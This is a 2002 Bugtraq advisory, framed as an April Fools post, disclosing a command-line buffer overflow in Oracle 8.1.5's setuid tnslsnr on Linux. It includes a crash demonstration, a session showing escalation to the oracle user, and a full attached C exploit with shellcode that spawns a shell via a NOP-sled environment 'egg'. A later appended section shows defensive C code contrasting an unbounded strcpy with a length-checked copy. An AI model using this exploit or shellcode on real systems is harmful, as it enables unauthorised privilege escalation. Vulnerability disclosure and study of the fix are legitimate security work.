Date: Mon, 01 Apr 2002 10:22:43 -0500
From: KF <[email protected]>
To: bugtraq <[email protected]>,
Subject: Happy Easter / April Fools from Snosoft (Oracle 8.1.5 tnslsnr)
This is meant to be an April Fools joke, but if you still use old Oracle
it's not too funny I guess:
After I ate a few too many hard boiled eggs this weekend I decided to
install Oracle and play with it a little. Being poor I didn't have 800
bones to shell out on Oracle 16i so I had to settle with oldschool
Oracle 8i from this little mom and pop shop on my corner. They just
happened to have a copy that would run on Linux and it was only 50 bucks
so I bought it! After the install, no more than 10 minutes later, I found
an issue... I figured that most anything I would have found would
already be public knowledge or it was patched up somewhere along the way
to the current product version. Well, from what I can tell this is an
unknown issue.
TNSLSNR for Linux: Version 8.1.5.0.0 - Production on 01-APR-02 11:46:53
[itchie@ghetto itchie]$ ls -al
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr
-rwsr-s--x 1 oracle oracle 4399723 Jun 11 1999
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr
There were holes reported on the abuse of $ORACLE_HOME...
http://online.securityfocus.com/archive/1/140704
which tnslsnr had issues with, but these appeared patched on this install
so I didn't bother trying to use env variables as abuse.
[dotslash@ghetto itchie]$ export ORACLE_HOME=`perl -e 'print "A" x 9000'`
[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
(no result...exit normally)
The first thing abnormal I tried hit right on the money... simple
cmdline b0f
[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
`perl -e 'print "A" x 9000'`
Segmentation fault
Of course I had to give one of my developers a quick ring and try to
harass him to stop molesting the Easter bunny and take a second to code
me up an exploit. Much obliged, "The Itch" took about 10 minutes
(literally) to come up with the following...
Happy Easter! and April Fools?!
[itchie@ghetto tmp]$ cc -o tnslsnrx tnslsnrx.c
[itchie@ghetto tmp]$ id
uid=507(itchie) gid=507(itchie) groups=507(itchie)
[itchie@ghetto tmp]$ ./tnslsnrx
Oracle tnslsrn 8.1.5
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org
Using return address: 0xbffffaf4
Using buffersize : 2132
sh-2.05$ id
uid=515(oracle) gid=507(itchie) groups=507(itchie)
-KF
Attachment: 8iwasbreakable.c
/*
 * Yet another exploit for the 'Unbreakable' Oracle database
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Shellcode created by r0z / Promisc
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail [email protected] if you wish to participate in vuln research.
 *
 * - The Itch
 * - [email protected]
 *
 * - Technical details concerning the exploit -
 *
 * 1). Buffer overflow occurs after writing more than 2132 bytes into the
 *     buffer at the command line (2128 to overwrite ebp, 2132 to
 *     overwrite eip).
 * 2). If you write more than 2132 bytes, other frames will be
 *     overwritten afterwards and will mess up your flow of arbitrary code
 *     execution. (It must be exactly 2132 bytes!)
 * 3). shellcode will try to do a setreuid(515);
 *
 * Target is 32-bit x86 Linux: the address stores below assume a 4-byte long.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */

#define DEFAULT_EGG_SIZE 4096
#define NOP 0x90
/* 2132 + 1 for the \0 at the end of the string */
#define DEFAULT_BUFFER_SIZE 2133

/* Shellcode made by r0z ([email protected]) */
char shellcode[] =
    "\x31\xdb"             /* xor %ebx, %ebx */
    "\x31\xc9"             /* xor %ecx, %ecx */
    "\xf7\xe3"             /* mul %ebx */
    "\xb0\x46"             /* mov $0x46, %al */
    "\x66\xbb\x03\x02"     /* mov $0x1fc, %bx */
    "\x49"                 /* dec %ecx */
    "\xcd\x80"             /* int $0x80 */
    "\x31\xd2"             /* xor %edx, %edx */
    "\x52"                 /* push %edx */
    "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
    "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
    "\x89\xe3"             /* mov %esp, %ebx */
    "\x52"                 /* push %edx */
    "\x53"                 /* push %ebx */
    "\x89\xe1"             /* mov %esp, %ecx */
    "\x6a\x0b"             /* pushl $0xb */
    "\x58"                 /* pop %eax */
    "\xcd\x80";            /* int $0x80 */

int main(int argc, char *argv[])
{
    char *buff;
    char *egg;
    char *ptr;
    long *addr_ptr;
    int bsize = DEFAULT_BUFFER_SIZE;
    int eggsize = DEFAULT_EGG_SIZE;
    int i;
    /* the address of this local is the stack estimate used as return address */
    long get_sp = (long)&get_sp;

    if(argc > 1) { bsize = atoi(argv[1]); }

    /* 4 bytes of slack so the 4-byte address stores below cannot run past the end */
    if(!(buff = malloc(bsize + 4)))
    {
        printf("unable to allocate memory for %d bytes\n", bsize);
        exit(1);
    }
    if(!(egg = malloc(eggsize)))
    {
        printf("unable to allocate memory for %d bytes\n", eggsize);
        exit(1);
    }

    printf("Oracle tnslsrn 8.1.5\n");
    printf("Vulnerability found by KF / http://www.snosoft.com\n");
    printf("Coded by The Itch / http://www.promisc.org\n\n");
    printf("Using return address: 0x%lx\n", get_sp);
    printf("Using buffersize : %d\n", bsize - 1);

    /* command-line argument: the return address repeated, 4 bytes at a time */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

    /* egg: NOP sled followed by the shellcode, handed over in the environment */
    ptr = egg;
    for(i = 0; i < eggsize - (int)strlen(shellcode) - 1; i++)
    {
        *(ptr++) = NOP;
    }
    for(i = 0; i < (int)strlen(shellcode); i++)
    {
        *(ptr++) = shellcode[i];
    }
    egg[eggsize - 1] = '\0';
    memcpy(egg, "EGG=", 4);
    putenv(egg);

    buff[bsize - 1] = '\0';
    execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr",
          "tnslsnr", buff, (char *)0);
    return 0;
}
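The defect behind the segfault in the post and the "2128 to overwrite ebp, 2132 to overwrite eip" note in the attachment is the classic unbounded copy of a command-line argument into a fixed-size stack buffer. The C program below is an added illustration, not code from KF's post, from The Itch, or from Oracle: it places that vulnerable shape next to a length-checked replacement that refuses over-long input instead of writing past the buffer. The 64-byte buffer, the 9000-'A' argument (mirroring the perl one-liner in the post) and the function names copy_arg_unchecked, copy_arg_checked, handle_arg, make_long_arg and handle_arg_of_length are all constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed buffer size for the demonstration. The advisory's real frame
 * holds 2128 bytes before the saved ebp and 2132 before the saved eip. */
#define ARG_BUF_SIZE 64

/* The vulnerable shape (hypothetical, modelled on the advisory's description):
 * the argument is copied with no bound, so an argument longer than dst keeps
 * writing past the buffer into the saved frame pointer and return address.
 * Kept here only for contrast and only ever called with input known to fit. */
void copy_arg_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: measure first, refuse anything that does not fit together
 * with its terminator, and never truncate silently (a silently truncated
 * path or SID is a different bug). Returns 0 on success, -1 if rejected. */
int copy_arg_checked(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (dstlen == 0 || n >= dstlen)
        return -1;
    memcpy(dst, src, n + 1);   /* n + 1 copies the NUL as well */
    return 0;
}

/* Mirrors a command-line parser's frame: a fixed stack buffer filled from
 * argv. Returns the accepted argument's length, or -1 if it was rejected. */
int handle_arg(const char *arg)
{
    char buf[ARG_BUF_SIZE];
    if (copy_arg_checked(buf, sizeof buf, arg) != 0)
        return -1;
    return (int)strlen(buf);
}

/* Builds a constructed argument of len 'A's (like the perl one-liner in the
 * post) into out, which must have room for len + 1 bytes. */
void make_long_arg(char *out, size_t len)
{
    memset(out, 'A', len);
    out[len] = '\0';
}

/* Boundary helper: feeds handle_arg an argument of exactly len 'A's
 * (len capped at 9000) and returns its verdict. */
int handle_arg_of_length(size_t len)
{
    char tmp[9001];
    if (len > 9000)
        len = 9000;
    make_long_arg(tmp, len);
    return handle_arg(tmp);
}

int main(int argc, char *argv[])
{
    char small[ARG_BUF_SIZE];

    printf("short argument: %d\n", handle_arg("ORCL"));            /* 4 */
    printf("63-byte argument: %d\n", handle_arg_of_length(63));    /* 63 */
    printf("64-byte argument: %d\n", handle_arg_of_length(64));    /* -1 */
    printf("9000-byte argument: %d\n", handle_arg_of_length(9000)); /* -1 */

    /* The unchecked copy with a fitting value is harmless, but it has no way
     * of refusing the 9000-byte argument, which is the whole defect. */
    copy_arg_unchecked(small, "ORCL");
    printf("unchecked copy of a fitting value: %s\n", small);

    if (argc > 1)
        printf("argv[1]: %d\n", handle_arg(argv[1]));
    return 0;
}
```

Rejecting rather than truncating is deliberate: a listener that silently shortened an over-long argument would still run, but with a value the operator never intended, and the rejection point is also where a defender would log the event.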